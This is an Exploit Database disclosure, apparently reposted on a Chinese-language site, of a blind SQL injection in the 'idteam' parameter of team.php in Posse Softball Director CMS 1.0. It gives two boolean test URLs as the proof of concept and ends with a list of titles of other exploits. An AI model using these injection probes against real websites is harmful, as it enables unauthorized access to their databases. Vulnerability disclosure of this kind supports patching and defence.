Posse Softball Director CMS – ‘team.php’ Blind SQL Injection

Exploit Database
36 阅读

作者： Easy Laster

日期： 2012-01-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18320/

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
 ~ Posse Softball Director CMS Blind SQL Injection Vulnerability team.php~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
[+] Autor: easy laster
[+] Vulnerabilities [Blind SQL Injection ]
[+] Page: www.possesports.com
[+] Language: [ PHP ]
[+] Version: 1.0
[+] Date: 04.01.2012
[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability

team.php?idteam=

[+] Exploitable

http://[host]/[path]/team.php?idteam=1+and+1=1--+ #true
http://[host]/[path]/team.php?idteam=1+and+1=2--+ #false

last Exploits
Posse Softball Director CMS – ‘team.php’ Blind SQL Injection的更多信息

EgavilanMedia PHPCRUD 1.0 – ‘First Name’ SQL Injection：
WordPress Plugin wp-FileManager – Arbitrary File Download：
ASUS DSL-X11 ADSL Router – DNS Change：
MyBB Like Plugin 3.0.0 – Cross-Site Scripting：
WordPress Plugin Ultimate Product Catalogue 4.2.2 – SQL Injection：
glFusion 1.1.x/1.2.1 – ‘users.php’ SQL Injection：
Faculty Evaluation System 1.0 – Stored XSS：
IceWarp Mail Server 11.0.0.0 – Cross-Site Scripting：